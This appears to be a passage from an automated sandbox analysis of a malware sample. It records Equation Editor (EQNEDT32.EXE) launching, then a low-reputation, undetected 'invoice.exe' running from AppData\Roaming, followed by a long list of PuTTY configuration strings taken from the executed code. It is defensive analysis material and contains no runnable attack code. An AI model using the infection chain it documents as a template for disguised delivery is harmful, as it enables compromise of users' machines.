Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	2
Start time:	16:50:52
Start date:	22/03/2022
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	4
Start time:	16:50:55
Start date:	22/03/2022
Path:	C:\Users\user\AppData\Roaming\invoice.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\invoice.exe"
Imagebase:	0x13fd50000
File size:	1273576 bytes
MD5 hash:	B3BB91AD96F2D4C041861CE59BA6AC73
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, Virustotal, Browse Detection: 0%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	low

Show Windows behavior

Target ID:	6
Start time:	16:51:14
Start date:	22/03/2022
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Execution Graph

Execution Coverage:	4.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	67.6%
Total number of Nodes:	1891
Total number of Limit Nodes:	36

Executed Functions

Function 000000013FD548EC Relevance: 680.9, Strings: 541, Instructions: 4630
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

What to do if the log file already exists:, xrefs: 000000013FD553D7
Options controlling session logging, xrefs: 000000013FD5514F
Enable VT100 line drawing even in UTF-8 mode, xrefs: 000000013FD56A41
config-localedit, xrefs: 000000013FD557F9
Options controlling SSH connections, xrefs: 000000013FD57E3E
SSH packets and raw data, xrefs: 000000013FD55188
Environment variables, xrefs: 000000013FD576F2
(Use 1M for 1 megabyte, 1G for 1 gigabyte etc), xrefs: 000000013FD58371
config-ptelnet, xrefs: 000000013FD59AC4
config-features-charset, xrefs: 000000013FD56151
Allow attempted changes of username in SSH-2, xrefs: 000000013FD588E5
Treat CJK ambiguous characters as wide, xrefs: 000000013FD56903
Session/Logging, xrefs: 000000013FD55148, 000000013FD55499
Options controlling proxy usage, xrefs: 000000013FD57916
config-ssh-x11, xrefs: 000000013FD58E0B
Permit control characters in pasted text, xrefs: 000000013FD56CAD
Include header, xrefs: 000000013FD55451
Control use of mouse, xrefs: 000000013FD56A6F
Push erased text into scrollback, xrefs: 000000013FD56475
**MORE** processing, xrefs: 000000013FD59DAA
Adjust the use of the cursor, xrefs: 000000013FD564C4
Connection/SSH/Host keys, xrefs: 000000013FD58383, 000000013FD58455
Options specific to SSH packet logging, xrefs: 000000013FD554A7
The colour, xrefs: 000000013FD56FAA
Passive, xrefs: 000000013FD59AED
Connection/SUPDUP, xrefs: 000000013FD59C56
config-utf8linedraw, xrefs: 000000013FD56A2B
config-boldcolour, xrefs: 000000013FD56F7E
Reset scrollback on display activity, xrefs: 000000013FD5643D
Disable bidirectional text display, xrefs: 000000013FD561D7
config-scrollback, xrefs: 000000013FD5637B
Connection/Data, xrefs: 000000013FD574E2
Printable output, xrefs: 000000013FD55257
config-title, xrefs: 000000013FD5677A
supdup-ascii, xrefs: 000000013FD59D11
config-ssh-bug-sig, xrefs: 000000013FD5953B
Return key sends Telnet New Line instead of ^M, xrefs: 000000013FD59B7B
Bell is temporarily disabled when over-used, xrefs: 000000013FD55D96
This:, xrefs: 000000013FD58CEF
Indicate bolded text by changing:, xrefs: 000000013FD56FDD
c->radio.nbuttons == 0, xrefs: 000000013FD54C8B
Set the size of the window, xrefs: 000000013FD56252
Variable, xrefs: 000000013FD57779
Separate window and icon titles, xrefs: 000000013FD567DB
config-ssh-bug-oldgex2, xrefs: 000000013FD5957B
Application keypad settings:, xrefs: 000000013FD55B32
config-ssh-comp, xrefs: 000000013FD57FBD
config-address-family, xrefs: 000000013FD573C5
Never, xrefs: 000000013FD550F4
Only on clean exit, xrefs: 000000013FD550E3
Terminal modes to send:, xrefs: 000000013FD58B6E
Both, xrefs: 000000013FD56F99
config-ssh-noshell, xrefs: 000000013FD57F5D
config-command, xrefs: 000000013FD57EF5
config-cjk-ambig-wide, xrefs: 000000013FD568ED
X display location, xrefs: 000000013FD58E76
config-features-mouse, xrefs: 000000013FD55F5C
Protocol options, xrefs: 000000013FD57F3B, 000000013FD57F9E, 000000013FD580D8
Options controlling the terminal bell, xrefs: 000000013FD55C73
config-printing, xrefs: 000000013FD55891
Connection/SSH/X11, xrefs: 000000013FD58DC9
ESC[n~, xrefs: 000000013FD55AF1
config-termspeed, xrefs: 000000013FD576B3
{Ctrl,Shift} + Ins:, xrefs: 000000013FD56C1A
tweaks, xrefs: 000000013FD568C8
Options controlling SSH encryption, xrefs: 000000013FD5861D
Options controlling the effects of keys, xrefs: 000000013FD558D7
Ignores SSH-2 maximum packet size, xrefs: 000000013FD594E9
Linux, xrefs: 000000013FD55AE0
Options controlling copy and paste, xrefs: 000000013FD56A5D
config-ssh-kex-order, xrefs: 000000013FD581D9
Answerback to ^E:, xrefs: 000000013FD556EE
Select a colour from the list, and then click the Modify button to change its appearance., xrefs: 000000013FD5703A
For selected mode, send:, xrefs: 000000013FD58C22
config-backspace, xrefs: 000000013FD55933
Options controlling character set translation, xrefs: 000000013FD56847
Connection/SSH/Auth, xrefs: 000000013FD586CE
config-ssh-encryption, xrefs: 000000013FD58655
Remote-controlled printing, xrefs: 000000013FD5585F
config-proxy, xrefs: 000000013FD57A60
Local echo:, xrefs: 000000013FD557B0
Gap between text and window edge:, xrefs: 000000013FD566F6
None, xrefs: 000000013FD55268, 000000013FD5609A, 000000013FD579F3, 000000013FD59D44
Chokes on SSH-1 RSA authentication, xrefs: 000000013FD59716
Share SSH connections if possible, xrefs: 000000013FD5803A
Adjust the use of the mouse pointer, xrefs: 000000013FD56649
Default selection mode (Alt+drag does the other one):, xrefs: 000000013FD56B40
Only supports pre-RFC4419 SSH-2 DH GEX, xrefs: 000000013FD59596
config-ssh-bug-chanreq, xrefs: 000000013FD5948E
Character set translation, xrefs: 000000013FD56860
Exclude Hosts/IPs, xrefs: 000000013FD57B4E
config-features-application, xrefs: 000000013FD55EED
backends[c->radio.nbuttons], xrefs: 000000013FD54DA6
Disable remote-controlled terminal resizing, xrefs: 000000013FD55FAA
Disable xterm-style mouse reporting, xrefs: 000000013FD55F72
config-ssh-tryagent, xrefs: 000000013FD587D3
Force off, xrefs: 000000013FD5576C, 000000013FD55811
Font settings, xrefs: 000000013FD565E7
SSH protocol version:, xrefs: 000000013FD5816E
Blue, xrefs: 000000013FD571BE
config-logheader, xrefs: 000000013FD5543B
Adjust how %s handles line drawing characters, xrefs: 000000013FD56918
config-ssh-bug-pksessid2, xrefs: 000000013FD595FB
config-termtype, xrefs: 000000013FD57661
config-ssh-bug-ignore2, xrefs: 000000013FD593C7
Further workarounds for SSH server bugs, xrefs: 000000013FD59508
Requires padding on SSH-2 RSA signatures, xrefs: 000000013FD59556
Options controlling key re-exchange, xrefs: 000000013FD58254
Allow agent forwarding, xrefs: 000000013FD588AD
Logical name of remote host:, xrefs: 000000013FD5745A
Window/Selection/Copy, xrefs: 000000013FD56CC2
config-closeonexit, xrefs: 000000013FD550D2
config-autowrap, xrefs: 000000013FD5556A
SOCKS 5, xrefs: 000000013FD579D1
config-ssh-pty, xrefs: 000000013FD58B08
RGB value:, xrefs: 000000013FD570C9
Don't allocate a pseudo-terminal, xrefs: 000000013FD58B1E
protocol, xrefs: 000000013FD57F34, 000000013FD57F97, 000000013FD580D1, 000000013FD599E3
Terminal/Features, xrefs: 000000013FD55EAF
Telnet protocol adjustments, xrefs: 000000013FD599EA
config-warnonclose, xrefs: 000000013FD56815
config-localecho, xrefs: 000000013FD55756
Open, xrefs: 000000013FD549CE
Prefer algorithms for which a host key is known, xrefs: 000000013FD58422
Disable destructive backspace on server sending ^?, xrefs: 000000013FD5612F
config-rectselect, xrefs: 000000013FD56AE7
Add, xrefs: 000000013FD5780E, 000000013FD5911A
IPv4, xrefs: 000000013FD573EF, 000000013FD592EC
Options controlling Telnet connections, xrefs: 000000013FD599D1
f, xrefs: 000000013FD59A78
Disable application cursor keys mode, xrefs: 000000013FD55F06
Options controlling copying from terminal to clipboard, xrefs: 000000013FD56CC9
Empty string, xrefs: 000000013FD56089
config-ssh-auth-gssapi-libraries, xrefs: 000000013FD58A44
Connection/Proxy, xrefs: 000000013FD5790F
Remote, xrefs: 000000013FD59236
Options controlling the terminal emulation, xrefs: 000000013FD5552F
Attempt TIS or CryptoCard auth (SSH-1), xrefs: 000000013FD58821
Seconds of silence required, xrefs: 000000013FD55E97
config-ssh-notrivialauth, xrefs: 000000013FD5877F
Local, xrefs: 000000013FD59247
config-ssh-auth-gssapi-delegation, xrefs: 000000013FD58A00
Only until session starts, xrefs: 000000013FD57D8F
config-logging, xrefs: 000000013FD5520B
Miscomputes SSH-2 encryption keys, xrefs: 000000013FD59656
XDM-Authorization-1, xrefs: 000000013FD58ECB
Rectangular block, xrefs: 000000013FD56AFD
Enable legacy use of single-DES in SSH-2, xrefs: 000000013FD586B0
config-linedrawpaste, xrefs: 000000013FD569F3
Mouse paste action:, xrefs: 000000013FD56BDE
WAITS, xrefs: 000000013FD59D22
Line discipline options, xrefs: 000000013FD5570D
Cancel, xrefs: 000000013FD54A27
Proxy type:, xrefs: 000000013FD57A15
Algorithm selection policy:, xrefs: 000000013FD581F6
config-hostname, xrefs: 000000013FD54B08, 000000013FD54E0F
Printer to send ANSI printer output to:, xrefs: 000000013FD558B8
Control the bell overload behaviour, xrefs: 000000013FD55D54
config-selection-autocopy, xrefs: 000000013FD56B81
Use background colour to erase screen, xrefs: 000000013FD55660
config-tcp-keepalives, xrefs: 000000013FD5734A
config-crlf, xrefs: 000000013FD555DA
Initial state of numeric keypad:, xrefs: 000000013FD55C54
DEC Origin Mode initially on, xrefs: 000000013FD555B8
rxvt, xrefs: 000000013FD559D4
Private key file for authentication:, xrefs: 000000013FD5893A
Omit known password fields, xrefs: 000000013FD554DF
Internet protocol version, xrefs: 000000013FD5737C
config-loghost, xrefs: 000000013FD574A7
Use system username (%s), xrefs: 000000013FD57589
Window/Translation, xrefs: 000000013FD56840
Terminal-type string, xrefs: 000000013FD57681
... in this many seconds, xrefs: 000000013FD55E2F
Implicit LF in every CR, xrefs: 000000013FD55628
r, xrefs: 000000013FD5528A
Window/Behaviour, xrefs: 000000013FD56727
Data bits, xrefs: 000000013FD598A8
Control-H, xrefs: 000000013FD5595D
Save, xrefs: 000000013FD54FFD
Active, xrefs: 000000013FD59ADC
config-truecolour, xrefs: 000000013FD56F1F
config-ssh-noauth, xrefs: 000000013FD58747
config-username, xrefs: 000000013FD5753B
config-homeend, xrefs: 000000013FD559BE
config-ssh-kex-rekey, xrefs: 000000013FD58283
Authentication methods, xrefs: 000000013FD587B1
Enable blinking text, xrefs: 000000013FD55698
Options controlling SUPDUP connections, xrefs: 000000013FD59C5D
config-serial-databits, xrefs: 000000013FD59888
Use Unicode line drawing code points, xrefs: 000000013FD569A4
Sending of null packets to keep session active, xrefs: 000000013FD5725C
Block, xrefs: 000000013FD56554
Source port, xrefs: 000000013FD5916E
Warn before closing window, xrefs: 000000013FD5682B
config-ssh-bug-rekey, xrefs: 000000013FD5940E
Workarounds for SSH server bugs, xrefs: 000000013FD59386
config-ssh-x11auth, xrefs: 000000013FD58EB5
config-ssh-bug-hmac2, xrefs: 000000013FD595BB
config-ssh-portfwd, xrefs: 000000013FD58FDB
config-keepalive, xrefs: 000000013FD5728B
Extended ASCII Character set:, xrefs: 000000013FD59D6F
repeat, xrefs: 000000013FD5824D
config-mouseptr, xrefs: 000000013FD5666E
Close window on exit:, xrefs: 000000013FD55130
config-ssh-hostkey-order, xrefs: 000000013FD583C2
Control-? (127), xrefs: 000000013FD5594C
Connection, xrefs: 000000013FD5723C, 000000013FD572E2
Configure the appearance of %s's window, xrefs: 000000013FD5648A
Terminal/Keyboard, xrefs: 000000013FD558D0, 000000013FD55B3C
Set, xrefs: 000000013FD56E36, 000000013FD58C55
Remote X11 authentication protocol, xrefs: 000000013FD58EFE
Disable remote-controlled clearing of scrollback, xrefs: 000000013FD560F7
config-ssh-bug-rsa1, xrefs: 000000013FD596FB
identity, xrefs: 000000013FD5746C
Load, save or delete a stored session, xrefs: 000000013FD54E76
Print proxy diagnostics in the terminal window, xrefs: 000000013FD57DDB
Attempt "keyboard-interactive" auth (SSH-2), xrefs: 000000013FD58859
Save the current session settings, xrefs: 000000013FD54A94
config-ssh-changeuser, xrefs: 000000013FD588CF
config-erasetoscrollback, xrefs: 000000013FD5645F
Chokes on SSH-1 ignore messages, xrefs: 000000013FD59696
Hide mouse pointer when typing in window, xrefs: 000000013FD56684
Auto-copy selected text to system clipboard, xrefs: 000000013FD56B97
Location string, xrefs: 000000013FD59CC8
Set the style of bell, xrefs: 000000013FD55C8C
IPv6, xrefs: 000000013FD573DE, 000000013FD592DB
Connection/SSH/More bugs, xrefs: 000000013FD59501
config-proxy-type, xrefs: 000000013FD57993
Lines of scrollback, xrefs: 000000013FD5639E
When username is not specified:, xrefs: 000000013FD57606
otheropts, xrefs: 000000013FD5508C
Options controlling the connection, xrefs: 000000013FD57243
Window, xrefs: 000000013FD56202, 000000013FD56244, 000000013FD56341
config-proxy-auth, xrefs: 000000013FD57C61
Connection/SSH/Cipher, xrefs: 000000013FD58616
ipversion, xrefs: 000000013FD57375
config-ssh-privkey, xrefs: 000000013FD58907
Refuses all SSH-1 password camouflage, xrefs: 000000013FD596D6
BSD (commonplace), xrefs: 000000013FD59A56
config-selection-clipactions, xrefs: 000000013FD56BAC
Stop bits, xrefs: 000000013FD598FA
Omit session data, xrefs: 000000013FD55513
Specify the destination you want to connect to, xrefs: 000000013FD54AC9
Log file name:, xrefs: 000000013FD5531B
Miscomputes SSH-2 HMAC keys, xrefs: 000000013FD595D6
Modify, xrefs: 000000013FD571FF
Standard, xrefs: 000000013FD559E5
Delete, xrefs: 000000013FD55052
None (bell disabled), xrefs: 000000013FD55D0C
Other:, xrefs: 000000013FD54DBF
Login details, xrefs: 000000013FD57507
Make default system alert sound, xrefs: 000000013FD55CFB
charclass, xrefs: 000000013FD56CDB
config-ssh-portfwd-address-family, xrefs: 000000013FD592C0
Auto, xrefs: 000000013FD5578E, 000000013FD57400, 000000013FD57BFC, 000000013FD58D25, 000000013FD592FD
Encryption cipher selection policy:, xrefs: 000000013FD58675
VT100+, xrefs: 000000013FD55AAD
Rows, xrefs: 000000013FD5630F
supdup-more, xrefs: 000000013FD59D94
User-supplied GSSAPI library path:, xrefs: 000000013FD58AB1
Replies to requests on closed channels, xrefs: 000000013FD594A9
config-ssh-bug-derivekey2, xrefs: 000000013FD5963B
Chokes on PuTTY's SSH-2 'winadj' requests, xrefs: 000000013FD59469
General options for colour usage, xrefs: 000000013FD56E86
config-oldenviron, xrefs: 000000013FD59A2F
config-ssh-agentfwd, xrefs: 000000013FD58897
Shift overrides application's use of mouse, xrefs: 000000013FD56AAE
trans, xrefs: 000000013FD56859
Key, xrefs: 000000013FD58592
Terminal speeds, xrefs: 000000013FD576D3
config-features-shaping, xrefs: 000000013FD56189
Local ports accept connections from other hosts, xrefs: 000000013FD58F71
Handling of line drawing characters:, xrefs: 000000013FD569CE
Connection/SSH/Auth/GSSAPI, xrefs: 000000013FD58953
Always, xrefs: 000000013FD55105
Window/Colours, xrefs: 000000013FD56E66
Forwarded ports:, xrefs: 000000013FD58FEA
Prompt, xrefs: 000000013FD575E4
Options controlling local serial lines, xrefs: 000000013FD59768
Red, xrefs: 000000013FD57116
config-serial-line, xrefs: 000000013FD597B6
config-ssh-sharing, xrefs: 000000013FD58021
mappings, xrefs: 000000013FD558EE
config-serial-speed, xrefs: 000000013FD5982F
Enable TCP keepalives (SO_KEEPALIVE option), xrefs: 000000013FD57360
disclaimer, xrefs: 000000013FD57E71
config-cursor, xrefs: 000000013FD5650D
Cursor blinks, xrefs: 000000013FD565C4
config-colourcfg, xrefs: 000000013FD5702B
Window/Selection, xrefs: 000000013FD56A56
config-answerback, xrefs: 000000013FD556C7
config-proxy-exclude, xrefs: 000000013FD57B2B
Max data before rekey (0 for no limit), xrefs: 000000013FD58351
Adjust the precise colours %s displays, xrefs: 000000013FD56FF5
ldisc, xrefs: 000000013FD55706
Port forwarding, xrefs: 000000013FD58F36
config-ssh-prefer-known-hostkeys, xrefs: 000000013FD5840C
Options controlling SSH X11 forwarding, xrefs: 000000013FD58DD0
config-font, xrefs: 000000013FD56610
Handles SSH-2 key re-exchange badly, xrefs: 000000013FD59429
Value, xrefs: 000000013FD577C9
term, xrefs: 000000013FD57626
Basic options for your %s session, xrefs: 000000013FD54A56
All session output, xrefs: 000000013FD55246
config-serial-parity, xrefs: 000000013FD59921
sshtty, xrefs: 000000013FD58AE3
params, xrefs: 000000013FD5886E
Normal, xrefs: 000000013FD55B99, 000000013FD56B0E
The Backspace key, xrefs: 000000013FD55982
general, xrefs: 000000013FD55541, 000000013FD56E7F
Password, xrefs: 000000013FD57CD2
Connection/Telnet, xrefs: 000000013FD599CA
config-features-altscreen, xrefs: 000000013FD55FCC
Terminal modes, xrefs: 000000013FD58B3A
config-ssh-banner, xrefs: 000000013FD5870F
Set to class, xrefs: 000000013FD56DF8
Display scrollbar, xrefs: 000000013FD563D5
config-environ, xrefs: 000000013FD5774F
config-logflush, xrefs: 000000013FD553FC
Change the sequences sent by:, xrefs: 000000013FD558F5
Logical name of remote host, xrefs: 000000013FD57473
Downstream (connecting to the upstream PuTTY), xrefs: 000000013FD580BC
config-features-resize, xrefs: 000000013FD55F94
config-xtermcolour, xrefs: 000000013FD56EE7
Window title:, xrefs: 000000013FD5679D
Authentication parameters, xrefs: 000000013FD58875
Window/Appearance, xrefs: 000000013FD564A0, 000000013FD565F1
Connection/SSH/Bugs, xrefs: 000000013FD5937F
config-mouseshift, xrefs: 000000013FD56A98
Attempt authentication using Pageant, xrefs: 000000013FD587E9
main, xrefs: 000000013FD55161, 000000013FD55EC8, 000000013FD567F0, 000000013FD581B3, 000000013FD583A9, 000000013FD586E7, 000000013FD59398, 000000013FD59C6F
Terminal scrolling, xrefs: 000000013FD59DE2
RFC 1408 (unusual), xrefs: 000000013FD59A45
Data to send to the server, xrefs: 000000013FD574E9, 000000013FD57EC6, 000000013FD59BCC
Add key, xrefs: 000000013FD585DE
Connection/SSH/Kex, xrefs: 000000013FD5819A
config-ssh-prot, xrefs: 000000013FD58111
Attempt GSSAPI key exchange, xrefs: 000000013FD58238
config-winsize, xrefs: 000000013FD56297
Action to happen when a bell occurs:, xrefs: 000000013FD55D2E
config-ttymodes, xrefs: 000000013FD58B5F
config-proxy-command, xrefs: 000000013FD57D08
Configure the serial line, xrefs: 000000013FD59803
Add new forwarded port:, xrefs: 000000013FD590EB
Do DNS name lookup at proxy end:, xrefs: 000000013FD57C2F
serline, xrefs: 000000013FD59783
config-ssh-kex-manual-hostkeys, xrefs: 000000013FD5848E
SCO, xrefs: 000000013FD55A96
Connection/SSH/TTY, xrefs: 000000013FD58ACA
Nothing, xrefs: 000000013FD58D0C
backends[i], xrefs: 000000013FD54CFD
Disable remote-controlled character set configuration, xrefs: 000000013FD56167
Permitted roles in a shared connection:, xrefs: 000000013FD58057
config-appkeypad, xrefs: 000000013FD55C01
Remove, xrefs: 000000013FD5784C, 000000013FD584EA, 000000013FD59037
Cursor appearance:, xrefs: 000000013FD56586
Copy and paste line drawing characters as lqqqk, xrefs: 000000013FD56A09
Options controlling use of colours, xrefs: 000000013FD56E6D
config-features-bidi, xrefs: 000000013FD561C1
s, xrefs: 000000013FD55295
Options controlling SSH host keys, xrefs: 000000013FD5838A
Load, xrefs: 000000013FD54FBC
Local username:, xrefs: 000000013FD59C22
Options controlling SSH key exchange, xrefs: 000000013FD581A1
config-features-qtitle, xrefs: 000000013FD56060
MIT-Magic-Cookie-1, xrefs: 000000013FD58EDC
Key exchange algorithm options, xrefs: 000000013FD581BA
config-ssh-bug-plainpw1, xrefs: 000000013FD596BB
Select a colour to adjust:, xrefs: 000000013FD57099
Misuses the session ID in SSH-2 PK auth, xrefs: 000000013FD59616
Port, xrefs: 000000013FD54B88, 000000013FD57ADF
Options controlling GSSAPI authentication, xrefs: 000000013FD5895A
config-ssh-bug-maxpkt2, xrefs: 000000013FD594CE
Apply, xrefs: 000000013FD549C7
config-features-dbackspace, xrefs: 000000013FD56119
Disable switching to alternate terminal screen, xrefs: 000000013FD55FE2
Sharing an SSH connection between PuTTY tools, xrefs: 000000013FD57FFF
config-paste-ctrl-char, xrefs: 000000013FD56C97
VT400, xrefs: 000000013FD55ABE
Options controlling Rlogin connections, xrefs: 000000013FD59BB3
config-appcursor, xrefs: 000000013FD55B6F
Flush log file frequently, xrefs: 000000013FD55419
Attempt GSSAPI authentication (SSH-2 only), xrefs: 000000013FD589AA
data, xrefs: 000000013FD57EBF, 000000013FD59BC5
config-telnetnl, xrefs: 000000013FD59B65
Disconnect if authentication succeeds trivially, xrefs: 000000013FD58795
Enable compression, xrefs: 000000013FD57FD3
The bell is re-enabled after a few seconds of silence., xrefs: 000000013FD55E4F
Disable Nagle's algorithm (TCP_NODELAY option), xrefs: 000000013FD57328
HTTP, xrefs: 000000013FD579C0
Always append to the end of it, xrefs: 000000013FD553A4
config-telnetkey, xrefs: 000000013FD59B2D
Dynamic Library Files (*.dll), xrefs: 000000013FD58AB8
Disable application keypad mode, xrefs: 000000013FD55F3A
Columns, xrefs: 000000013FD562BA
SOCKS 4, xrefs: 000000013FD579E2
Destination, xrefs: 000000013FD591C2
basics, xrefs: 000000013FD57928
config-proxy-dns, xrefs: 000000013FD57BD2
Configure the behaviour of %s's window, xrefs: 000000013FD5670E
config-funkeys, xrefs: 000000013FD55A70
hostport, xrefs: 000000013FD54AC2
Remote character set:, xrefs: 000000013FD568B0
Local line editing:, xrefs: 000000013FD55840
Chokes on SSH-2 ignore messages, xrefs: 000000013FD593E9
Host keys or fingerprints to accept:, xrefs: 000000013FD5849D
Connection/SSH, xrefs: 000000013FD57E37, 000000013FD57E6A, 000000013FD57EB8, 000000013FD57F90, 000000013FD57FF1
Telnet negotiation mode:, xrefs: 000000013FD59B08
Reset scrollback on keypress, xrefs: 000000013FD56409
Select session log file name, xrefs: 000000013FD5530A
Ctrl + Shift + {C,V}:, xrefs: 000000013FD56C56
Connection/SSH/Tunnels, xrefs: 000000013FD58F16
Host key algorithm preference, xrefs: 000000013FD5839C
The font, xrefs: 000000013FD56FBB
Initial state of cursor keys:, xrefs: 000000013FD55BBB
SSH packets, xrefs: 000000013FD55181
Assign copy/paste actions to clipboards, xrefs: 000000013FD56B5F
config-features-retitle, xrefs: 000000013FD56004
config-serial-flow, xrefs: 000000013FD5996A
config-bellovl, xrefs: 000000013FD55D76
config-ssh-ki, xrefs: 000000013FD58843
config-decom, xrefs: 000000013FD555A2
Allow terminal to use 24-bit colours, xrefs: 000000013FD56F35
supdup-scroll, xrefs: 000000013FD59DCC
Response to remote title query (SECURITY):, xrefs: 000000013FD560BC
Disable remote-controlled window title changing, xrefs: 000000013FD5601A
config-bellstyle, xrefs: 000000013FD55CD2
Visual bell (flash window), xrefs: 000000013FD55CEA
Handling of OLD_ENVIRON ambiguity:, xrefs: 000000013FD59A88
Username, xrefs: 000000013FD57C84
Enabling and disabling advanced terminal features, xrefs: 000000013FD55EB6
Manually configure host keys for this connection, xrefs: 000000013FD58463
Max minutes before rekey (0 for no limit), xrefs: 000000013FD582AD
Keyboard sends Telnet special commands, xrefs: 000000013FD59B43
Speed (baud), xrefs: 000000013FD59856
Select a serial line, xrefs: 000000013FD5978A
Control pasting of text from clipboard to terminal, xrefs: 000000013FD56C75
Allow terminal to use xterm 256-colour mode, xrefs: 000000013FD56EFD
The Function keys and keypad, xrefs: 000000013FD55B13
Always overwrite it, xrefs: 000000013FD553B5
Bypass authentication entirely (SSH-2 only), xrefs: 000000013FD5875D
Auto-login username, xrefs: 000000013FD5755B
Underline, xrefs: 000000013FD56543
Disable Arabic text shaping, xrefs: 000000013FD5619F
Flow control, xrefs: 000000013FD5998C
Control the scrollback in the window, xrefs: 000000013FD5634F
Nothing on this panel may be reconfigured in mid-session; it is only here so that sub-panels of it can exist without looking strange., xrefs: 000000013FD57E8D
config-logssh, xrefs: 000000013FD554C6
config-features-clearscroll, xrefs: 000000013FD560E1
Low-level TCP connection options, xrefs: 000000013FD572F0
Window title, xrefs: 000000013FD56078
Dynamic, xrefs: 000000013FD59225
Detection of known bugs in SSH servers, xrefs: 000000013FD5939F
config-nodelay, xrefs: 000000013FD57312
Parity, xrefs: 000000013FD59943
The Home and End keys, xrefs: 000000013FD55A00
Connection type:, xrefs: 000000013FD54BC6
Don't start a shell or command at all, xrefs: 000000013FD57F73
(Log file name can contain &Y, &M, &D for date, &T for time, &H for host name, and &P for port number), xrefs: 000000013FD55338
Remote terminal settings, xrefs: 000000013FD58AD1
supdup-location, xrefs: 000000013FD59CA1
Remote ports do the same (SSH-2 only), xrefs: 000000013FD58FA5
Allow terminal to specify ANSI colours, xrefs: 000000013FD56EC5
config-ssh-portfwd-localhost, xrefs: 000000013FD58F58
NetHack, xrefs: 000000013FD55C17
1 (INSECURE), xrefs: 000000013FD58122
Consider proxying local host connections, xrefs: 000000013FD57B8C
Terminal details, xrefs: 000000013FD5762D
tcp, xrefs: 000000013FD572E9
Set various terminal options, xrefs: 000000013FD55548
config-erase, xrefs: 000000013FD5564A
config-winborder, xrefs: 000000013FD566CF
Remote command:, xrefs: 000000013FD57F1C
PuTTY Private Key Files (*.ppk), xrefs: 000000013FD58941
config-linedraw, xrefs: 000000013FD56971
Options controlling SSH port forwarding, xrefs: 000000013FD58F1D
Font used in the terminal window, xrefs: 000000013FD5662D
config-proxy-logging, xrefs: 000000013FD57D71
Serial line to connect to, xrefs: 000000013FD597DD
config-logfileexists, xrefs: 000000013FD5537B
Enable X11 forwarding, xrefs: 000000013FD58E24
Adjust the window border, xrefs: 000000013FD566A0
Xterm R6, xrefs: 000000013FD55ACF
Minutes between GSS checks (0 for never), xrefs: 000000013FD582FB
Telnet command, xrefs: 000000013FD57D28
Allow GSSAPI credential delegation, xrefs: 000000013FD58A16
overload, xrefs: 000000013FD55D4D
Options controlling SSH authentication, xrefs: 000000013FD586D5
Poor man's line drawing (+, - and |), xrefs: 000000013FD5698A
Session, xrefs: 000000013FD54A65, 000000013FD54ABB, 000000013FD54E84, 000000013FD55085
Host Name (or IP address), xrefs: 000000013FD54B32
config-ssh-bug-winadj, xrefs: 000000013FD5944E
Yes, xrefs: 000000013FD57BEB, 000000013FD57DA0
config-ssh-tis, xrefs: 000000013FD5880B
Adjust the behaviour of the window title, xrefs: 000000013FD5674B
Green, xrefs: 000000013FD5716D
Auto wrap mode initially on, xrefs: 000000013FD55580
adjust, xrefs: 000000013FD5700B
Character classes:, xrefs: 000000013FD56D32
Connection/Rlogin, xrefs: 000000013FD59BAC
config-charset, xrefs: 000000013FD56889
sercfg, xrefs: 000000013FD597FC
Ask the user every time, xrefs: 000000013FD55393
config-lfcr, xrefs: 000000013FD55612
../config.c, xrefs: 000000013FD54C92, 000000013FD54CCC, 000000013FD54CEE, 000000013FD54DAD
config-blink, xrefs: 000000013FD55682
config-charclasses, xrefs: 000000013FD56D12
Select library file, xrefs: 000000013FD58AA0
Display pre-authentication banner (SSH-2 only), xrefs: 000000013FD58725
b, xrefs: 000000013FD59A80
Classes of character that group together, xrefs: 000000013FD56CE2
config-ansicolour, xrefs: 000000013FD56EA8
Connection/Serial, xrefs: 000000013FD59761, 000000013FD5977C, 000000013FD597F5
config-saving, xrefs: 000000013FD54ED9, 000000013FD54FA6, 000000013FD54FE7, 000000013FD5503C
Force on, xrefs: 000000013FD5577D
config-username-from-env, xrefs: 000000013FD575C4
Logical name of remote host (e.g. for SSH key lookup):, xrefs: 000000013FD57461
savedsessions, xrefs: 000000013FD54E8B
Proxy hostname, xrefs: 000000013FD57A8A
Attempt GSSAPI key exchange (SSH-2 only), xrefs: 000000013FD589DE
Upstream (connecting to the real server), xrefs: 000000013FD58088
n_ui_backends > 0 && n_ui_backends < PROTOCOL_LIMIT, xrefs: 000000013FD54CC5
Over-use means this many bells..., xrefs: 000000013FD55DE1
config-ssh-bug-ignore1, xrefs: 000000013FD5967B
Encryption options, xrefs: 000000013FD58636
Terminal, xrefs: 000000013FD55528, 000000013FD5586E
Implicit CR in every LF, xrefs: 000000013FD555F0
Saved Sessions, xrefs: 000000013FD54EFC
config-rlogin-localuser, xrefs: 000000013FD59BFB
config-ssh-auth-gssapi, xrefs: 000000013FD58222, 000000013FD58991
Select private key file, xrefs: 000000013FD58929
Session logging:, xrefs: 000000013FD552B8
config-logfilename, xrefs: 000000013FD552E5
6, xrefs: 000000013FD59320
Terminal/Bell, xrefs: 000000013FD55C6C
Application, xrefs: 000000013FD55B88, 000000013FD55C28
Preference order for GSSAPI libraries:, xrefs: 000000013FD58A64
Options controlling %s's window, xrefs: 000000013FD561EC
Vertical line, xrefs: 000000013FD56529
config-serial-stopbits, xrefs: 000000013FD598DA
Seconds between keepalives (0 to turn off), xrefs: 000000013FD572B2

Memory Dump Source

